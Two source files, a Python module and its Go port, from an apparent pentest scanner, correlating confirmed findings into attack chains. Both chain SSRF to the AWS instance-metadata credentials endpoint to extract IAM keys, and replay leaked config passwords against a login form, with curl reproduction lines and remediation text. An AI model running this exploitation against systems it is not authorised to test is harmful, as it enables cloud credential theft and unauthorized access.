File: modules/chains.py
"""Attack-path chain correlation.

Runs *after* adaptive confirmation, over the now-finalized findings in the
store. Where a human pentester would look at two confirmed findings and think
"wait, these compose into something much worse" (SSRF that reaches cloud
metadata + that metadata returns real keys; a leaked password + a login form
that accepts it), this module performs **one** additional materialization step
to either prove the chain for real or stay silent. A chain only becomes a new
`Finding` when something genuinely new was extracted — restating the base
finding under a scarier title would just be noise.
"""
from __future__ import annotations
import re
import uuid
from pathlib import Path
from urllib.parse import urlparse, urlunparse, parse_qsl, urlencode

import requests

from . import adaptive
from .findings import Finding, FindingStore, Severity
from .checks.ratelimit import LOGIN_PATHS


# ── Generic param-replay (chain rules run after Candidate.context closures are
#    gone — probes are reconstructed from Finding.url / Finding.parameter) ────

def _replay_url(url: str, param: str, value: str) -> str:
    parsed = urlparse(url)
    query = dict(parse_qsl(parsed.query, keep_blank_values=True))
    query[param] = value
    return urlunparse(parsed._replace(query=urlencode(query)))


def _replay_with_param(session: requests.Session, url: str, param: str, value: str,
                        timeout: int = 10):
    try:
        return session.get(_replay_url(url, param, value), timeout=timeout, allow_redirects=False)
    except Exception:
        return None


# ── Rule 1: SSRF → cloud metadata → stolen temporary credentials ─────────────

_CLOUD_METADATA_RE = re.compile(
    r"(aws metadata|azure metadata|gcp metadata|169\.254\.169\.254|metadata\.google\.internal)",
    re.IGNORECASE,
)

_AWS_ROLE_LIST_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
_ROLE_NAME_RE = re.compile(r"^([\w.\-]{1,128})\s*$")

_CLOUD_CREDENTIAL_SIGNATURES: list[tuple[str, str]] = [
    (r'"AccessKeyId"\s*:\s*"([^"]+)"', "AWS AccessKeyId"),
    (r'"SecretAccessKey"\s*:\s*"([^"]+)"', "AWS SecretAccessKey"),
    (r'"Token"\s*:\s*"([A-Za-z0-9/+=]{20,})"', "AWS Session Token"),
    (r'"access_token"\s*:\s*"([^"]+)"', "OAuth/cloud access_token"),
]


def _scan_for_cloud_credentials(text: str) -> list[tuple[str, str]]:
    hits = []
    for pattern, label in _CLOUD_CREDENTIAL_SIGNATURES:
        m = re.search(pattern, text)
        if m:
            hits.append((label, m.group(0)[:200]))
    return hits


def _chain_ssrf_to_cloud_credentials(session, base_url, store, endpoints, artifact_root,
                                      *, deep_dive, active_exploit, verbose=False) -> None:
    if not deep_dive:
        return

    for finding in store.all():
        if finding.kind != "ssrf" or finding.status != "confirmed-deep-dive":
            continue
        if not finding.url or not finding.parameter:
            continue
        if not _CLOUD_METADATA_RE.search(f"{finding.description}\n{finding.evidence}"):
            continue

        role_resp = _replay_with_param(session, finding.url, finding.parameter, _AWS_ROLE_LIST_URL)
        if role_resp is None or role_resp.status_code >= 400 or not role_resp.text.strip():
            continue

        creds_text = role_resp.text
        role_name = None
        first_line = role_resp.text.strip().splitlines()[0].strip()
        role_match = _ROLE_NAME_RE.match(first_line)
        if role_match:
            role_name = role_match.group(1)
            creds_resp = _replay_with_param(session, finding.url, finding.parameter,
                                             _AWS_ROLE_LIST_URL + role_name)
            if creds_resp is not None and creds_resp.text.strip():
                creds_text = creds_resp.text

        hits = _scan_for_cloud_credentials(creds_text)
        if not hits:
            continue

        rel_path = adaptive._dump_artifact(
            artifact_root, finding.id, f"cloud_credentials_{finding.id}.json", creds_text[:8000]
        )
        target_desc = _AWS_ROLE_LIST_URL + (role_name or "")
        chain = Finding(
            title="Цепочка: SSRF → кража временных облачных учётных данных",
            severity=Severity.CRITICAL,
            description=(
                f"Базовая находка SSRF [{finding.id}] «{finding.title}» позволяет серверу "
                "выполнять исходящие HTTP-запросы по адресу из параметра. Использование этой "
                f"возможности для запроса IAM-метаданных облака ({target_desc}) вернуло "
                "содержимое с распознаваемыми реальными учётными данными:\n"
                + "\n".join(f"  - {label}: {snippet}" for label, snippet in hits) + "\n\n"
                "Это превращает теоретически опасный SSRF в подтверждённую кражу ключей "
                "доступа к облачной инфраструктуре цели — с ними возможен полноценный "
                "доступ к ресурсам аккаунта от имени скомпрометированной IAM-роли."
            ),
            url=finding.url,
            remediation=(
                f"1. Устраните SSRF в параметре '{finding.parameter}' (см. рекомендации находки [{finding.id}]).\n"
                "2. Заблокируйте доступ workload'ов к 169.254.169.254 на сетевом уровне "
                "(iptables/security groups) или перейдите на IMDSv2 с обязательным токеном.\n"
                "3. Немедленно отзовите/ротируйте скомпрометированные временные учётные данные "
                "и проведите аудит активности соответствующей IAM-роли в CloudTrail."
            ),
            reproduction=(
                f"# Подмена параметра '{finding.parameter}' адресом метаданных облака:\n"
                f"curl -s '{_replay_url(finding.url, finding.parameter, target_desc)}'"
            ),
            evidence=f"Извлечённые учётные данные сохранены в артефакт: {rel_path}",
            parameter=finding.parameter,
            category="Attack Chain",
            cwe="CWE-918",
            status="confirmed-deep-dive",
            confidence=1.0,
            kind="chain",
            verification_log=[
                f"CONFIRMED (chain): повторная отправка SSRF-payload [{finding.id}] с адресом "
                f"метаданных IAM ({target_desc}) вернула содержимое с сигнатурами реальных "
                f"облачных учётных данных ({', '.join(label for label, _ in hits)})"
            ],
            artifacts=[rel_path],
        )
        store.add(chain)
        print(f"  [+] CONFIRMED: {chain.title}")


# ── Rule 2: leaked credentials → successful login ────────────────────────────
# Performs a real authentication attempt — gated on `active_exploit`
# (aggressive only), same philosophy as `run_sqlmap`.

_USERNAME_RE = re.compile(r"(?im)^\s*(?:DB_USER(?:NAME)?|ADMIN_USER(?:NAME)?|APP_USER|USERNAME|LOGIN)\s*=\s*[\"']?([^\s\"']+)")
_PASSWORD_RE = re.compile(r"(?im)^\s*(?:DB_PASSWORD|ADMIN_PASS(?:WORD)?|APP_PASSWORD|PASSWORD|SECRET)\s*=\s*[\"']?([^\s\"']+)")

_USERNAME_KEY_RE = re.compile(r"(user(?:name)?|login|email)", re.IGNORECASE)
_PASSWORD_KEY_RE = re.compile(r"(pass(?:word)?|pwd|secret)", re.IGNORECASE)


def _extract_credential_pair(text: str):
    user_match = _USERNAME_RE.search(text)
    pass_match = _PASSWORD_RE.search(text)
    if user_match and pass_match:
        return user_match.group(1), pass_match.group(1)
    return None


def _find_login_surface(endpoints):
    """Returns (endpoint, username_field, password_field) or None."""
    for ep in endpoints:
        if ep.method.upper() != "POST":
            continue
        keys = list(dict(ep.body_params or ep.params))
        user_key = next((k for k in keys if _USERNAME_KEY_RE.search(k)), None)
        pass_key = next((k for k in keys if _PASSWORD_KEY_RE.search(k)), None)
        if user_key and pass_key:
            return ep, user_key, pass_key
    for ep in endpoints:
        if ep.method.upper() == "POST" and any(ep.parsed.path.rstrip("/").endswith(p) for p in LOGIN_PATHS):
            return ep, "username", "password"
    return None


def _chain_leaked_credentials_to_login(session, base_url, store, endpoints, artifact_root,
                                        *, deep_dive, active_exploit, verbose=False) -> None:
    if not active_exploit:
        return

    surface = _find_login_surface(endpoints)
    if surface is None:
        return
    login_ep, user_key, pass_key = surface

    for finding in store.all():
        if finding.kind != "disclosure" or finding.status != "confirmed-deep-dive" or not finding.artifacts:
            continue

        pair = None
        for rel_path in finding.artifacts:
            try:
                text = (artifact_root.parent / rel_path).read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            pair = _extract_credential_pair(text)
            if pair:
                break
        if pair is None:
            continue
        username, password = pair

        try:
            real_resp = session.post(login_ep.url, data={user_key: username, pass_key: password},
                                      timeout=10, allow_redirects=True)
            control_resp = session.post(
                login_ep.url,
                data={user_key: f"__vsw_{uuid.uuid4().hex[:6]}", pass_key: uuid.uuid4().hex},
                timeout=10, allow_redirects=True,
            )
        except Exception as e:
            if verbose:
                print(f"  [?] цепочка leaked-creds→login: запрос не удался: {e}")
            continue

        real_markers = set(adaptive._ADMIN_MARKERS.findall(real_resp.text))
        control_markers = set(adaptive._ADMIN_MARKERS.findall(control_resp.text))
        new_markers = real_markers - control_markers
        status_diverged = (real_resp.status_code in (200, 301, 302)
                           and control_resp.status_code not in (200, 301, 302)
                           and real_resp.status_code != control_resp.status_code)
        if not new_markers and not status_diverged:
            continue

        proof = (
            f"Login URL: {login_ep.url}\nUsername: {username}\nPassword: {password}\n\n"
            f"--- Ответ на похищенную пару (HTTP {real_resp.status_code}) ---\n{real_resp.text[:3000]}\n\n"
            f"--- Контрольный ответ на заведомо неверную пару (HTTP {control_resp.status_code}) ---\n"
            f"{control_resp.text[:1000]}"
        )
        rel_path = adaptive._dump_artifact(artifact_root, finding.id, f"login_proof_{finding.id}.txt", proof)

        signal = (", ".join(sorted(new_markers))
                  if new_markers else f"HTTP {real_resp.status_code} вместо {control_resp.status_code} у контроля")
        chain = Finding(
            title="Цепочка: утечка учётных данных → успешный вход в систему",
            severity=Severity.CRITICAL,
            description=(
                f"Базовая находка раскрытия информации [{finding.id}] «{finding.title}» содержала "
                f"пару учётных данных ({username}:***). Использование этой пары для входа на "
                f"{login_ep.url} прошло успешно — ответ содержит признаки авторизованной сессии "
                f"({signal}), отсутствующие в ответе на заведомо неверную (контрольную) пару. "
                "Это превращает утечку конфигурации в подтверждённый несанкционированный доступ к системе."
            ),
            url=login_ep.url,
            remediation=(
                "1. Немедленно смените скомпрометированные учётные данные и проведите аудит "
                "активности под этой учётной записью.\n"
                f"2. Устраните источник утечки (см. рекомендации находки [{finding.id}]).\n"
                "3. Включите многофакторную аутентификацию для административных учётных записей."
            ),
            reproduction=(
                f"curl -s -X POST '{login_ep.url}' "
                f"--data '{user_key}={username}&{pass_key}=<пароль из артефакта {rel_path}>'"
            ),
            evidence=f"Доказательство успешного входа сохранено: {rel_path}",
            parameter=user_key,
            method="POST",
            category="Attack Chain",
            cwe="CWE-522",
            status="confirmed-deep-dive",
            confidence=1.0,
            kind="chain",
            verification_log=[
                f"CONFIRMED (chain): пара учётных данных из находки [{finding.id}] прошла "
                f"дифференциальную проверку входа на {login_ep.url} — успешный ответ содержит "
                "маркеры/код состояния, отсутствующие в ответе на контрольную (заведомо неверную) пару"
            ],
            artifacts=[rel_path],
        )
        store.add(chain)
        print(f"  [+] CONFIRMED: {chain.title}")
        return


CHAIN_RULES = [
    _chain_ssrf_to_cloud_credentials,
    _chain_leaked_credentials_to_login,
]


def run_chain_analysis(session: requests.Session, base_url: str, store: FindingStore,
                       endpoints: list, artifact_root: Path,
                       deep_dive: bool, active_exploit: bool, verbose: bool = False) -> None:
    before = len(store)
    for rule in CHAIN_RULES:
        try:
            rule(session, base_url, store, endpoints, artifact_root,
                 deep_dive=deep_dive, active_exploit=active_exploit, verbose=verbose)
        except Exception as e:
            print(f"  [!] анализ цепочек ({rule.__name__}): {e}")
            if verbose:
                import traceback
                traceback.print_exc()

    built = len(store) - before
    if built:
        print(f"[+] Анализ цепочек атак завершён: построено и подтверждено цепочек — {built}")
    else:
        print("[+] Анализ цепочек атак завершён: подтверждённых цепочек не найдено")

File: go-vectrix/internal/chains/chains.go
// Package chains correlates already-confirmed findings into attack-path
// chains. It runs after adaptive confirmation, over the now-finalized
// findings in the store. Where a human pentester would look at two confirmed
// findings and think "wait, these compose into something much worse" (SSRF
// that reaches cloud metadata + that metadata returns real keys; a leaked
// password + a login form that accepts it), this package performs one
// additional materialization step to either prove the chain for real or stay
// silent. A chain only becomes a new finding when something genuinely new was
// extracted.
//
// Mirrors modules/chains.py.
package chains

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/url"
	"os"
	"path/filepath"
	"regexp"
	"sort"
	"strings"
	"time"

	"vectrixgo/internal/adaptive"
	"vectrixgo/internal/crawler"
	"vectrixgo/internal/findings"
	"vectrixgo/internal/httpsession"
	"vectrixgo/internal/logging"
)

// loginPaths mirrors modules/chains.py LOGIN_PATHS.
var loginPaths = []string{
	"/login", "/signin", "/api/login", "/api/signin",
	"/api/auth/login", "/api/auth/token", "/api/token",
	"/api/v1/login", "/api/v2/login", "/auth/local",
}

// ── Generic param-replay ─────────────────────────────────────────────────────

// replayURL mirrors modules/chains.py _replay_url.
func replayURL(rawurl, param, value string) string {
	parsed, err := url.Parse(rawurl)
	if err != nil {
		return rawurl
	}
	q := parsed.Query()
	q.Set(param, value)
	parsed.RawQuery = q.Encode()
	return parsed.String()
}

// replayWithParam mirrors modules/chains.py _replay_with_param.
func replayWithParam(session *httpsession.Session, rawurl, param, value string, timeout time.Duration) *httpsession.Response {
	resp, err := session.Request("GET", replayURL(rawurl, param, value), httpsession.Options{AllowRedirects: false, Timeout: timeout})
	if err != nil {
		return nil
	}
	return resp
}

// ── Rule 1: SSRF -> cloud metadata -> stolen temporary credentials ──────────

var cloudMetadataRe = regexp.MustCompile(`(?i)(aws metadata|azure metadata|gcp metadata|169\.254\.169\.254|metadata\.google\.internal)`)

const awsRoleListURL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

var roleNameRe = regexp.MustCompile(`^([\w.\-]{1,128})\s*$`)

type cloudCredSignature struct {
	pattern *regexp.Regexp
	label   string
}

// cloudCredentialSignatures mirrors modules/chains.py _CLOUD_CREDENTIAL_SIGNATURES.
var cloudCredentialSignatures = []cloudCredSignature{
	{regexp.MustCompile(`"AccessKeyId"\s*:\s*"([^"]+)"`), "AWS AccessKeyId"},
	{regexp.MustCompile(`"SecretAccessKey"\s*:\s*"([^"]+)"`), "AWS SecretAccessKey"},
	{regexp.MustCompile(`"Token"\s*:\s*"([A-Za-z0-9/+=]{20,})"`), "AWS Session Token"},
	{regexp.MustCompile(`"access_token"\s*:\s*"([^"]+)"`), "OAuth/cloud access_token"},
}

type credHit struct {
	label   string
	snippet string
}

// scanForCloudCredentials mirrors modules/chains.py _scan_for_cloud_credentials.
func scanForCloudCredentials(text string) []credHit {
	var hits []credHit
	for _, sig := range cloudCredentialSignatures {
		loc := sig.pattern.FindStringIndex(text)
		if loc == nil {
			continue
		}
		match := text[loc[0]:loc[1]]
		if len(match) > 200 {
			match = match[:200]
		}
		hits = append(hits, credHit{label: sig.label, snippet: match})
	}
	return hits
}

// chainSSRFToCloudCredentials mirrors modules/chains.py _chain_ssrf_to_cloud_credentials.
func chainSSRFToCloudCredentials(session *httpsession.Session, baseURL string, store *findings.FindingStore, endpoints []crawler.Endpoint, artifactRoot string, deepDive, activeExploit, verbose bool) {
	if !deepDive {
		return
	}

	for _, finding := range store.All() {
		if finding.Kind != "ssrf" || finding.Status != "confirmed-deep-dive" {
			continue
		}
		if finding.URL == "" || finding.Parameter == "" {
			continue
		}
		if !cloudMetadataRe.MatchString(finding.Description + "\n" + finding.Evidence) {
			continue
		}

		roleResp := replayWithParam(session, finding.URL, finding.Parameter, awsRoleListURL, 10*time.Second)
		if roleResp == nil || roleResp.StatusCode >= 400 || strings.TrimSpace(roleResp.Body) == "" {
			continue
		}

		credsText := roleResp.Body
		roleName := ""
		lines := strings.Split(strings.TrimSpace(roleResp.Body), "\n")
		firstLine := strings.TrimSpace(lines[0])
		if m := roleNameRe.FindStringSubmatch(firstLine); m != nil {
			roleName = m[1]
			credsResp := replayWithParam(session, finding.URL, finding.Parameter, awsRoleListURL+roleName, 10*time.Second)
			if credsResp != nil && strings.TrimSpace(credsResp.Body) != "" {
				credsText = credsResp.Body
			}
		}

		hits := scanForCloudCredentials(credsText)
		if len(hits) == 0 {
			continue
		}

		relPath, err := adaptive.DumpArtifact(artifactRoot, finding.ID, fmt.Sprintf("cloud_credentials_%s.json", finding.ID), truncate(credsText, 8000))
		if err != nil {
			continue
		}

		targetDesc := awsRoleListURL + roleName

		hitLines := make([]string, 0, len(hits))
		labels := make([]string, 0, len(hits))
		for _, h := range hits {
			hitLines = append(hitLines, fmt.Sprintf("  - %s: %s", h.label, h.snippet))
			labels = append(labels, h.label)
		}

		chain := findings.NewFinding(
			"Цепочка: SSRF → кража временных облачных учётных данных",
			findings.Critical,
			"Attack Chain",
			"CWE-918",
			finding.URL,
			fmt.Sprintf("Базовая находка SSRF [%s] «%s» позволяет серверу "+
				"выполнять исходящие HTTP-запросы по адресу из параметра. Использование этой "+
				"возможности для запроса IAM-метаданных облака (%s) вернуло "+
				"содержимое с распознаваемыми реальными учётными данными:\n%s\n\n"+
				"Это превращает теоретически опасный SSRF в подтверждённую кражу ключей "+
				"доступа к облачной инфраструктуре цели — с ними возможен полноценный "+
				"доступ к ресурсам аккаунта от имени скомпрометированной IAM-роли.",
				finding.ID, finding.Title, targetDesc, strings.Join(hitLines, "\n")),
			fmt.Sprintf("1. Устраните SSRF в параметре '%s' (см. рекомендации находки [%s]).\n"+
				"2. Заблокируйте доступ workload'ов к 169.254.169.254 на сетевом уровне "+
				"(iptables/security groups) или перейдите на IMDSv2 с обязательным токеном.\n"+
				"3. Немедленно отзовите/ротируйте скомпрометированные временные учётные данные "+
				"и проведите аудит активности соответствующей IAM-роли в CloudTrail.",
				finding.Parameter, finding.ID),
			fmt.Sprintf("# Подмена параметра '%s' адресом метаданных облака:\ncurl -s '%s'",
				finding.Parameter, replayURL(finding.URL, finding.Parameter, targetDesc)),
		)
		chain.Evidence = fmt.Sprintf("Извлечённые учётные данные сохранены в артефакт: %s", relPath)
		chain.Parameter = finding.Parameter
		chain.Status = "confirmed-deep-dive"
		chain.Confidence = 1.0
		chain.Kind = "chain"
		chain.VerificationLog = []string{
			fmt.Sprintf("CONFIRMED (chain): повторная отправка SSRF-payload [%s] с адресом "+
				"метаданных IAM (%s) вернула содержимое с сигнатурами реальных "+
				"облачных учётных данных (%s)", finding.ID, targetDesc, strings.Join(labels, ", ")),
		}
		chain.Artifacts = []string{relPath}
		store.Add(chain)
		logging.Printf("  [+] CONFIRMED: %s", chain.Title)
	}
}

// ── Rule 2: leaked credentials -> successful login ───────────────────────────
// Performs a real authentication attempt — gated on activeExploit
// (aggressive only), same philosophy as run_sqlmap.

var usernameRe = regexp.MustCompile(`(?im)^\s*(?:DB_USER(?:NAME)?|ADMIN_USER(?:NAME)?|APP_USER|USERNAME|LOGIN)\s*=\s*["']?([^\s"']+)`)
var passwordRe = regexp.MustCompile(`(?im)^\s*(?:DB_PASSWORD|ADMIN_PASS(?:WORD)?|APP_PASSWORD|PASSWORD|SECRET)\s*=\s*["']?([^\s"']+)`)

var usernameKeyRe = regexp.MustCompile(`(?i)(user(?:name)?|login|email)`)
var passwordKeyRe = regexp.MustCompile(`(?i)(pass(?:word)?|pwd|secret)`)

// extractCredentialPair mirrors modules/chains.py _extract_credential_pair.
func extractCredentialPair(text string) (string, string, bool) {
	userMatch := usernameRe.FindStringSubmatch(text)
	passMatch := passwordRe.FindStringSubmatch(text)
	if userMatch != nil && passMatch != nil {
		return userMatch[1], passMatch[1], true
	}
	return "", "", false
}

// findLoginSurface mirrors modules/chains.py _find_login_surface.
func findLoginSurface(endpoints []crawler.Endpoint) (*crawler.Endpoint, string, string, bool) {
	for i := range endpoints {
		ep := &endpoints[i]
		if !strings.EqualFold(ep.Method, "POST") {
			continue
		}
		params := ep.BodyParams
		if len(params) == 0 {
			params = ep.Params
		}
		keys := make([]string, 0, len(params))
		for k := range params {
			keys = append(keys, k)
		}
		sort.Strings(keys)

		var userKey, passKey string
		for _, k := range keys {
			if userKey == "" && usernameKeyRe.MatchString(k) {
				userKey = k
			}
			if passKey == "" && passwordKeyRe.MatchString(k) {
				passKey = k
			}
		}
		if userKey != "" && passKey != "" {
			return ep, userKey, passKey, true
		}
	}

	for i := range endpoints {
		ep := &endpoints[i]
		if !strings.EqualFold(ep.Method, "POST") {
			continue
		}
		parsed, err := url.Parse(ep.URL)
		if err != nil {
			continue
		}
		path := strings.TrimRight(parsed.Path, "/")
		for _, p := range loginPaths {
			if strings.HasSuffix(path, p) {
				return ep, "username", "password", true
			}
		}
	}

	return nil, "", "", false
}

// chainLeakedCredentialsToLogin mirrors modules/chains.py _chain_leaked_credentials_to_login.
func chainLeakedCredentialsToLogin(session *httpsession.Session, baseURL string, store *findings.FindingStore, endpoints []crawler.Endpoint, artifactRoot string, deepDive, activeExploit, verbose bool) {
	if !activeExploit {
		return
	}

	loginEp, userKey, passKey, ok := findLoginSurface(endpoints)
	if !ok {
		return
	}

	for _, finding := range store.All() {
		if finding.Kind != "disclosure" || finding.Status != "confirmed-deep-dive" || len(finding.Artifacts) == 0 {
			continue
		}

		var username, password string
		found := false
		for _, relPath := range finding.Artifacts {
			data, err := os.ReadFile(filepath.Join(filepath.Dir(artifactRoot), relPath))
			if err != nil {
				continue
			}
			if u, p, ok := extractCredentialPair(string(data)); ok {
				username, password = u, p
				found = true
				break
			}
		}
		if !found {
			continue
		}

		realResp, err := session.PostForm(loginEp.URL, url.Values{userKey: {username}, passKey: {password}}, nil)
		if err != nil {
			if verbose {
				logging.Printf("  [?] цепочка leaked-creds→login: запрос не удался: %v", err)
			}
			continue
		}
		controlResp, err := session.PostForm(loginEp.URL, url.Values{userKey: {"__vsw_" + randomHex(6)}, passKey: {randomHex(32)}}, nil)
		if err != nil {
			if verbose {
				logging.Printf("  [?] цепочка leaked-creds→login: запрос не удался: %v", err)
			}
			continue
		}

		realMarkers := setFromMatches(adaptive.AdminMarkers.FindAllString(realResp.Body, -1))
		controlMarkers := setFromMatches(adaptive.AdminMarkers.FindAllString(controlResp.Body, -1))
		newMarkers := setDifference(realMarkers, controlMarkers)

		statusDiverged := isOneOf(realResp.StatusCode, 200, 301, 302) &&
			!isOneOf(controlResp.StatusCode, 200, 301, 302) &&
			realResp.StatusCode != controlResp.StatusCode

		if len(newMarkers) == 0 && !statusDiverged {
			continue
		}

		proof := fmt.Sprintf("Login URL: %s\nUsername: %s\nPassword: %s\n\n"+
			"--- Ответ на похищенную пару (HTTP %d) ---\n%s\n\n"+
			"--- Контрольный ответ на заведомо неверную пару (HTTP %d) ---\n%s",
			loginEp.URL, username, password, realResp.StatusCode, truncate(realResp.Body, 3000),
			controlResp.StatusCode, truncate(controlResp.Body, 1000))
		relPath, err := adaptive.DumpArtifact(artifactRoot, finding.ID, fmt.Sprintf("login_proof_%s.txt", finding.ID), proof)
		if err != nil {
			continue
		}

		var signal string
		if len(newMarkers) > 0 {
			signal = joinSorted(newMarkers)
		} else {
			signal = fmt.Sprintf("HTTP %d вместо %d у контроля", realResp.StatusCode, controlResp.StatusCode)
		}

		chain := findings.NewFinding(
			"Цепочка: утечка учётных данных → успешный вход в систему",
			findings.Critical,
			"Attack Chain",
			"CWE-522",
			loginEp.URL,
			fmt.Sprintf("Базовая находка раскрытия информации [%s] «%s» содержала "+
				"пару учётных данных (%s:***). Использование этой пары для входа на "+
				"%s прошло успешно — ответ содержит признаки авторизованной сессии "+
				"(%s), отсутствующие в ответе на заведомо неверную (контрольную) пару. "+
				"Это превращает утечку конфигурации в подтверждённый несанкционированный доступ к системе.",
				finding.ID, finding.Title, username, loginEp.URL, signal),
			fmt.Sprintf("1. Немедленно смените скомпрометированные учётные данные и проведите аудит "+
				"активности под этой учётной записью.\n"+
				"2. Устраните источник утечки (см. рекомендации находки [%s]).\n"+
				"3. Включите многофакторную аутентификацию для административных учётных записей.",
				finding.ID),
			fmt.Sprintf("curl -s -X POST '%s' --data '%s=%s&%s=<пароль из артефакта %s>'",
				loginEp.URL, userKey, username, passKey, relPath),
		)
		chain.Evidence = fmt.Sprintf("Доказательство успешного входа сохранено: %s", relPath)
		chain.Parameter = userKey
		chain.Method = "POST"
		chain.Status = "confirmed-deep-dive"
		chain.Confidence = 1.0
		chain.Kind = "chain"
		chain.VerificationLog = []string{
			fmt.Sprintf("CONFIRMED (chain): пара учётных данных из находки [%s] прошла "+
				"дифференциальную проверку входа на %s — успешный ответ содержит "+
				"маркеры/код состояния, отсутствующие в ответе на контрольную (заведомо неверную) пару",
				finding.ID, loginEp.URL),
		}
		chain.Artifacts = []string{relPath}
		store.Add(chain)
		logging.Printf("  [+] CONFIRMED: %s", chain.Title)
		return
	}
}

// ── Helpers ───────────────────────────────────────────────────────────────────

func truncate(s string, n int) string {
	if len(s) <= n {
		return s
	}
	return s[:n]
}

func setFromMatches(matches []string) map[string]struct{} {
	s := make(map[string]struct{}, len(matches))
	for _, m := range matches {
		s[m] = struct{}{}
	}
	return s
}

func setDifference(a, b map[string]struct{}) map[string]struct{} {
	out := make(map[string]struct{})
	for k := range a {
		if _, ok := b[k]; !ok {
			out[k] = struct{}{}
		}
	}
	return out
}

func joinSorted(set map[string]struct{}) string {
	keys := make([]string, 0, len(set))
	for k := range set {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return strings.Join(keys, ", ")
}

func isOneOf(v int, options ...int) bool {
	for _, o := range options {
		if v == o {
			return true
		}
	}
	return false
}

func randomHex(n int) string {
	b := make([]byte, (n+1)/2)
	rand.Read(b)
	return hex.EncodeToString(b)[:n]
}

// ── Rule registry & entrypoint ────────────────────────────────────────────────

type chainRule struct {
	name string
	fn   func(session *httpsession.Session, baseURL string, store *findings.FindingStore, endpoints []crawler.Endpoint, artifactRoot string, deepDive, activeExploit, verbose bool)
}

// chainRules mirrors modules/chains.py CHAIN_RULES.
var chainRules = []chainRule{
	{"chain_ssrf_to_cloud_credentials", chainSSRFToCloudCredentials},
	{"chain_leaked_credentials_to_login", chainLeakedCredentialsToLogin},
}

// RunChainAnalysis runs every chain rule over the finalized findings in
// store. Mirrors modules/chains.py run_chain_analysis.
func RunChainAnalysis(session *httpsession.Session, baseURL string, store *findings.FindingStore, endpoints []crawler.Endpoint, artifactRoot string, deepDive, activeExploit, verbose bool) {
	before := store.Len()

	for _, rule := range chainRules {
		func() {
			defer func() {
				if r := recover(); r != nil {
					logging.Printf("  [!] анализ цепочек (%s): %v", rule.name, r)
				}
			}()
			rule.fn(session, baseURL, store, endpoints, artifactRoot, deepDive, activeExploit, verbose)
		}()
	}

	built := store.Len() - before
	if built > 0 {
		logging.Printf("[+] Анализ цепочек атак завершён: построено и подтверждено цепочек — %d", built)
	} else {
		logging.Println("[+] Анализ цепочек атак завершён: подтверждённых цепочек не найдено")
	}
}
